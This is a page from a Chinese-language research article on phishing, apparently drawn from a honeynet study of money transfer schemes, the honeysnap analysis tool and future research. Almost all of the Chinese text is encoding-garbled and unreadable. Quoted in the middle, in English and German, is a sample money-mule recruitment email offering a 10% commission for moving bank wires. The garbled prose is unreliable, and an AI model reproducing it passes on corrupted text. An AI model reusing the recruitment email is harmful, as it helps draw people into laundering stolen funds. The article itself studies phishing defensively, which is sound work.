һ̨ redir Ö÷»ú¿ÉÒԷdz£Áé»î£¬ÒòΪËü¿ÉÒÔͨ¹ý·Ç³£¼òµ¥µØÖØÐÂÅäÖÃÖ¸ÏòÁíÍâÒ»¸öµöÓãÍøÕ¾¡£ÕâÒ²¼õÉÙÁË´Ó³õʼµÄϵͳ¹¥Ïݵ½µöÓãÍøÕ¾¿ÉÓõÄÕâ¶Îʱ¼ä£¬´Ó¶øÔö¼ÓÁËÍøÂçµöÓã¹¥»÷¿ÉÒÔ½øÐеÄʱ¼ä³¤¶È¡£
ʹÓÃÕâÑùµÄ×éºÏ¹¥»÷¼¼ÊõÓÖÒ»´ÎÑéÖ¤Á˹¥»÷Õߵĸß×éÖ¯ÐÔºÍÄÜÁ¦£¬¶ø²»½ö½öÊǼòµ¥µÄ½Å±¾Ð¡×Ó¡£ÀàËÆµÄÔËÐÐÄ£ÐÍÒ²¾³£±»Ö÷Á÷µÄÍøÕ¾·þÎñÌṩÉ̺ͳ¬´óÈÝÁ¿Êý¾ÝÄÚÈÝÌṩÉÌ£¨Èç Google £©ËùÔËÓá£
½øÒ»²½µÄ·¢ÏÖ£º×ʽðתÕË
ÎÒÃǵÄÑо¿Í¬Ê±Ò²¹Ø×¢µöÓãÕßÈçºÎʹÓò¶»ñµÄÒøÐÐÕ˺ÅÐÅÏ¢£¨ÈçÒ»¸öÓëÏà¹ØµÄ½»Ò×´úºÅÁªÏµÔÚÒ»ÆðµÄÒøÐÐÕ˺ţ©¡£ÒòΪ´ó¶àÊýÒøÐж¼¶Ô¿ç¹úµÄ×ʽðÁ÷ͨ½øÐÐ¼à¿Ø£¬µöÓãÕß²¢²»Äܼòµ¥µØ²»ÒýÆð½ðÈÚȨÍþ»ú¹¹×¢ÒâÏ£¬´ÓÒ»¸ö¹ú¼Ò×ªÒÆÒ»´ó±Ê×ʽðµ½ÁíÍâÒ»¸ö¹ú¼Ò¡£µöÓãÕßÓÚÊÇʹÓÃһЩÖнéÀ´ÎªËûÃÇ×ªÒÆ×ʽð£ÒÔÁ½½×¶ÎµÄ²½Ö裬µöÓãÕßÏÈ´ÓÊܺ¦ÕßÒøÐÐÕ˺ÅÖаÑÇ®×ªÒÆµ½Ò»¸öͬ¹úÖнéÈ˵ÄÒøÐÐÕ˺ÅÖУ¬ÖнéÈËÈ»ºó´ÓËûÃǵÄÒøÐÐÕ˺ÅÖÐÌá³öÏÖ½ð£¨ÁôÏÂÒ»¶¨°Ù·Ö±È×÷ΪËûÃǵÄÌṩ´ËתÕË·þÎñµÄ±¨³ê£©²¢¼Ä¸øµöÓãÕߣ¬Èçͨ¹ýÆÕͨµÄµØÃæÐżþ¡£µ±È»£¬ÕâЩÖнéÈË¿ÉÄܱ»²¶£¬µ«ÊÇÓÉÓÚµöÓãÕßµÄÇ®ÒѾÔÚ´«Êä;ÖУ¬ËûÃDz¢²»»áÃæ¶ÔÌ«´óµÄ°²È«·çÏÕ£¬Í¬Ê±Ò²¿ÉÒÔºÜÈÝÒ×µØ×ªÒÆËûÃǵÄ×ʽðÁ÷ͨÇþµÀµ½ÁíÍâµÄÖнéÈË¡£Ò»¸ö¿ÉÒÔ˵Ã÷ÔÚÍøÂçµöÓã¹¥»÷±³ºóµÄ½ðÈڽṹµÄµç×ÓÓʼþʵÀýÈçÏ£º
Hello!
We finding Europe persons, who can Send/Receive bank wires
from our sellings, from our European clients. To not pay
TAXES from international transfers in Russia . We offer 10%
percent from amount u receive and pay all fees, for sending
funds back.Amount from 1000 euro per day. All this activity
are legal in Europe .
Fill this form: http://XXX.info/index.php (before filling
install yahoo! messenger please or msn), you will recieve
full details very quickly.
_________________________________________________________
Wir, europ?ische Personen findend, die Bankleitungen
davon Senden/erhalten k?nnen unsere Verk?ufe, von
unseren Kunden von Deutschland. STEUERN von internationalen
¨¹bertragungen in Russland nicht zu bezahlen. Wir
erh?lt das Prozent des Angebots 10 % vom Betrag und
bezahlt alle Schulgelder, um Kapital zur¨¹ck zu senden.
Betrag von 1000 Euro pro Tag. Diese ganze T?tigkeit
ist in Europa gesetzlich.
F¨¹llen Sie diese Form: http://XXX.info/index.php (bevor
die F¨¹llung Yahoo installiert! Bote bitte oder msn), Sie
recieve volle Details sehr.
Thank you, FINANCIE LTD.
ÕâÊÇÒ»·â´ÓÓ¢Îĵ½µÂÎĵķdz£ÀõķÒë¸å£¬¿ÉÄÜÊÇͨ¹ý·ÒëÈí¼þ×Ô¶¯²úÉúµÄ£¬ÕâҲ˵Ã÷¹¥»÷Õß²¢²»ÊÇÒÔÓ¢ÓïΪĸÓïµÄ¡£ÒòΪǮ½«»á±»×ªÒƵ½¶íÂÞ˹£¬ËùÒÔ¹¥»÷ÕߺܿÉÄÜÀ´×ÔÕâ¸ö¹ú¼Ò¡£×ʽð×ªÒÆÐÐΪҲÕýËæ×ÅÍøÂçµöÓã¹¥»÷Ô½À´Ô½¾ß×éÖ¯ÐÔ±äµÃÔ½À´Ô½ÆÕ±é¡£
Honeysnap ¨C Ò»¸ö¹¥»÷°¸Àý·ÖÎöÖúÊÖ
Ò»¸ö´ÓÎÒÃÇ¿ªÊ¼·ÖÎö±»ÉÏÊöÍøÂçµöÓã¹¥»÷¹¥ÏݵÄÃÛ¹ÞÊý¾ÝʱÁ¢¼´µÃµ½µÄÒ»¸ö½áÂÛÊÇ£ºÓÉÓÚ²»Í¬ºÚ¿Í×é֯ͬʱ½øÐеĶà¸ö¹¥»÷£¬ÎÒÃÇÐèÒª·Ç³£¶àµÄʱ¼ä´ÓÍøÂçµÄÁ÷Á¿ÖÐÈ¥³éÈ¡ºÍ×¼±¸ÓÃÓÚ½øÒ»²½Ïêϸ·ÖÎöµÄÊý¾Ý¡£Õâ¸öÊý¾Ý³éÈ¡¹ý³ÌÊÇÖØ¸´ÐÔµÄÇÒ¿ÝÔ﷦ζµÄ£¬Èç¹ûÓÉÈ˹¤½øÐн«»áʹµÃÎÒÃDZ¦¹óµÄ·ÖÎöʱ¼äµÄЧÂÊ´ó´òÕÛ¿Û¡£Òò´ËÐèÒªÒ»¸ö×Ô¶¯»¯µÄ½â¾ö·½°¸¡£
ÓÉÓ¢¹úÃÛ¹ÞÏîÄ¿×é David Watson ±àдµÄ honeysnap ½Å±¾ÕýÊÇ»ùÓÚ´ËÄ¿µÄ£¬±»Éè¼ÆÓÃÀ´¶ÔÃÛÍøÈÕ³£²¶»ñµÄÊý¾ÝΪÊäÈë²úÉú³öÒ»¸ö¼òµ¥µÄÕªÒªÊä³ö£¬ÓÃÓÚÖ¸µ¼½øÒ»²½µÄÈ˹¤·ÖÎö¡£ honeysnap ½Å±¾¶Ôÿ¸öÃÛ¹ÞµÄÊý¾Ý½øÐзÖÀ࣬ÌṩÁËÁ¬³öµÄ HTTP ºÍ FTP GETs ÇëÇó¡¢ IRC ÏûÏ¢ºÍ Sebek ¼ü»÷¼Ç¼ÈÕÖ¾ÁÐ±í¹¦ÄÜ£¬¶Ô¹Ø¼üÍøÂçÁ¬½ÓÄܹ»½øÐÐ×Ô¶¯»¯µÄ TCP Á÷ÖØ×飬²¢³éÈ¡¡¢±êʶºÍ´æ´¢ÓÉ FTP »ò HTTP ÏÂÔØµÄÎļþ£¬ honeysnap ½Å±¾Ê¹µÃ´ó¶àÊýÏûºÄ´óÁ¿Ê±¼äµÄ¹¥»÷°¸Àý×¼±¸ÐÔ¹¤×÷¶¼±»ÒƳý£¬Ê¹µÃ·ÖÎöÔ±Äܹ»¼¯Öо«Á¦È˹¤µØ·ÖÎö°¸ÀýÖеĹؼü²¿·Ö¡£ honeysnap ½Å±¾»¹Ö§³ÖÒ»¸ö×Ô¶¯»¯µÄ·½·¨¶Ô°üº¬¸ÐÐËȤµÄ¹Ø¼ü×Ö£¨ÈçÒøÐС¢Õ˺š¢¿ÚÁîµÈ£©µÄ IRC ͨѶ½øÐÐÏÔʾ£¬²¢ÌṩÈÕ³£Ð﵀ Email ±¨¸æ¹¦ÄÜ¡£
ĿǰµÄ honeysnap ½Å±¾µÄÒ»¸ö»ù±¾µÄ¸ÅÄîÖ¤Ã÷Ð﵀ UNIX shell ½Å±¾£¬Æä alpha °æ¿ÉÒÔÔÚ´ËÕÒµ½£¬Í¬Ê±Ò»×é honeysnap Êä³ö ʾÀý¿ÉÒÔÔÚ´ËÕÒµ½¡£Ò»¸öÄ£¿é»¯µÄ²¢ÍêÈ«À©Õ¹µÄÒÔ Python ±àдµÄ°æ±¾Ä¿Ç°ÕýÔÚÓÉÃÛÍøÏîÄ¿×éµÄ³ÉÔ±¿ª·¢ÖУ¬²¢½«Óë 2005 Äê 6 Ô·¢²¼ beta ²âÊÔ°æ¡£
½øÒ»²½µÄÑо¿
ÔÚ±¾Îĸø³öµÄÐÅÏ¢¸ø³öÁËÔÚÍøÂçµöÓã¹¥»÷ÁìÓò½øÐнøÒ»²½Ñо¿µÄһЩDZÔÚ·½·¨£¬ÎÒÃÇͬʱ½¨ÒéÔÚÒÔϵÄһЩ·½Ãæ½øÐиüÉîÈëµÄµ÷²éºÍÑо¿£º
ÎÒÃÇÏ£ÍûÄܹ»µ÷²éÃÛ¹Þ¼¼ÊõÄÜ·ñ±»ÓÃÓÚ°ïÖúÓëÀ¬»øÓʼþ·¢ËÍÕߺ͵öÓãÕß½øÐжԿ¹¡£Ò»¸ö¿ÉÄܵÄÑо¿ÏîÄ¿ÊDz¿ÊðһЩÔÚÉÏÊö¹Û²ìµ½µÄÍøÂçµöÓã¹¥»÷ÖÐËùͨ³£Ê¹ÓÃÀàÐ͵ÄÃÛ¹Þ£¬»òÊÇһЩ¶ÔÀ¬»øÓʼþ·¢ËÍÕß¾ßÓкÜÇ¿µÄÎüÒýÁ¦µÄÃÛ¹Þ£¨ Èç SMTP open relays £©£¬¶Ô¹¥»÷Õß¶ÔÕâЩϵͳµÄ¹¥»÷ÐÐΪ½øÐнøÒ»²½µÄ·ÖÎö£¬Äܹ»°ïÖúÎÒÃǸüÉîÈëµØ¶ÔÍøÂçµöÓã¹¥»÷½øÐÐÆÊÎö£¬ÌرðÊÇʹÓý©Ê¬ÍøÂç½øÐÐÍøÂçµöÓãÕâÒ»ÁìÓò£¬²¢Äܹ»¶ÔÍøÂçµöÓã¹¥»÷µÄ´´Ð½øÐиú×Ù¡£ÁíÍâÒ»¸öÑо¿µÄ¿ÉÄÜÐÔÊǽøÒ»²½·¢Õ¹Ã۹޵ĸÅÄÑо¿¿Í»§¶ËÃÛ¹Þ¼¼Êõ£¬ÕâÖÖÐÂÒ»´úµÄÃÛ¹Þ¹¤¾ßÄܸü»îÔ¾µØ²ÎÓëµ½Í¨Ñ¶ÍøÂçÖУ¬ÀýÈ磬×Ô¶¯µØËæ×ÅÀ¬»øÓʼþÖеÄÁ´½ÓÈ¥·ÃÎÊÄ¿±êÍøÕ¾ÄÚÈÝ¡£¿Í»§¶ËÃÛ¹Þ¹¤¾ß¿ÉÒÔÔÚ IRC ƵµÀÖз¢´ô»òͨ¹ý P2P ÍøÂç¹²Ïí / ÏÂÔØÎļþ£¬´Ó¶ø½øÒ»²½µØÌá¸ßÎÒÃǶÔÕâÐ©Í¨Ñ¶ÍøÂçÖÐËùÃæÁٵذ²È«ÍþвµÄÁ˽⡣
ÁíÍ⣬ÎÒÃÇÆÚÍûÄܹ»¶Ô¶Ô¸¶ºÍ×èÖ¹ÕâÐ©ÍøÂçµöÓã¹¥»÷µÄDZÔÚ·½·¨½øÐÐÉîÈëÑо¿¡£ÒòΪ´ÓÒ»¸öÍøÂçµöÓã¹¥»÷µÄ¿ªÊ¼µ½½áÊøµÄʱ¼äÖÜÆÚ¿ÉÄÜÖ»Óм¸¸öСʱ»ò¼¸Ì죬ͬʱ¹¥»÷Ô´Ò²¿ÉÄܹ㷺µØ·Ö²¼£¬ËùÒÔÕ⽫ÊÇÒ»¸öÀ§ÄѵÄÈÎÎñ¡£Ä¿Ç°ÔÚ´ËÁìÓòÑо¿µÄ¹¤×÷£¨Èç The AntiPhishing Group ºÍ PhishReport £©¹Ø×¢ÓÚÒÀ¿¿ÖÕ¶ËÓû§ÊÕ¼¯µöÓãÓʼþ¡£ËäÈ»ÕâÊǸö¿ÉÐеÄ;¾¶£¬µ«ËüÖ»ÄÜÔÚÍøÂçµöÓã¹¥»÷ÉúÃüÖÜÆÚµÄ×îºó½×¶Î½øÐз¢ÏÖ¡£ ÎÒÃǸüÐèÒªÒ»¸ö×Ô¶¯»¯µØ¶ÔÍøÂçµöÓã¹¥»÷²¶»ñºÍÏìÓ¦µÄ»úÖÆ¡£
ÎÒÃÇ»³ÒÉÕâЩÕ˺źͿÚÁîÔںڿͽç»á±»½øÐн»Ò×Á÷ͨ£¬¿ÉÄÜͨ¹ý IRC ¡£ÃÛÍø¼¼Êõ¿ÉÒÔ±»ÓÃÀ´²¶»ñÕâЩͨѶ£¬²¢¸üÉîÈëµØÁ˽âÍøÂçµöÓã¹¥»÷ÐÐΪ¡£ÁíÍâ£¬ÍøÂçµöÓã¹¥»÷¹¤¾ß¾³£¿ÉÒÔ´ÓһЩ¾³£¸üеØÖÐÑëÍøÕ¾·þÎñÆ÷»ò FTP ·þÎñÆ÷ÉÏÏÂÔØ»ñµÃ¡£¾¡¹Ü³äÂúÕùÒ飬µ«¶ÔÕâЩ»î¶¯¿ÉÒÔ½øÐÐ¼à¿Ø»òÁªÏµÏµÍ³ÓµÓÐÕßÒÔ°ïÖúËû×èÖ¹ÕâÐ©ÍøÂçµöÓã¹¥»÷£¬Í¬Ê±ÎÒÃÇÓ¦¸Ã½¨Á¢Ò»¸öÌåϵ¿ò¼Ü£¬´Ó¶ø¶ÔÕâЩ»î¶¯½øÐÐÑо¿£¬²¢Ìá³öDZÔڵĶԲߡ£
ÐèÒªÔÚÌá¸ß°¸Àý·ÖÎöµÄ×Ô¶¯»¯½øÐнøÒ»²½µÄÑо¿¹¤×÷£¬ÌرðÊǶÔÔÚÕâЩ¹¥»÷¹ý³ÌÖв¶»ñÊý¾ÝµÄ×Ô¶¯ÂÖÀªÉú³É¡£×Ô¶¯µÄÁ÷Á¿ºÍ IP µØÖ·³éÈ¡£¬ DNS ·´Ïò²éѯºÍ IP µØÖ·¿éÓµÓÐÕß²éѯ£¬Õë¶Ôÿ¸ö IP µØÖ·»òÿ¸öÓòÃûµÄÁ÷Á¿ÕªÒª£¬ÒÔ¼°±»¶¯µÄ²Ù×÷ÏµÍ³Ö¸ÎÆ±æÊ¶µÈ¹¦ÄÜÔÚ·ÖÎö´ó¹æÄ£µÄÊý¾Ý¼¯Ê±ÊǷdz£ÓÐÓõģ¬ÔÚ·ÖÎöÒ»¸ö±¾µØµÄ°üÀ¨ÒÑÖªÖ÷»ú¡¢¹¥»÷Õß¡¢¹¥»÷ÌØÕ÷¡¢ÏûÏ¢ÄÚÈݵȵÄȡ֤Êý¾Ý¿âÒ²ÊÇͬÑù¹Ø¼ü¡£ÔÚÒ»¸ö³¤ÆÚµÄ¹æ»®ÖУ¬ÐèÒª½¨Á¢¹²ÏíÕâЩÐÅÏ¢µÄͳһ±ê×¼£¬ÒÔ¼°Ò»¸öÈ«ÇòµÄȡ֤·ÖÎöÊý¾Ý¿â´Ó¶øÖ§³Ö¶Ô·Ö²¼Ê½µÄºÚ¿Í»î¶¯½øÐзÖÎö£¬ÕâÒ²½«ÊǶÔÕû¸ö»¥ÁªÍøÉçÇøËù¸ß¶ÈÐèÒªºÍÓÐÏÔÖøÒâÒåµÄ¡£
½áÂÛ
±¾ÎÄÖÐÎÒÃÇչʾÁËÒ»Ð©ÕæÊµÊÀ½ç·¢ÉúµÄÍøÂçµöÓã¹¥»÷µÄʵ¼Ê°¸Àý£¬ÒÔ¼°ÔÚÕâЩ°¸ÀýÖй¥»÷Õ
| ¹²3Ò³: ÉÏÒ»Ò³ [1] [2] 3 | ||
|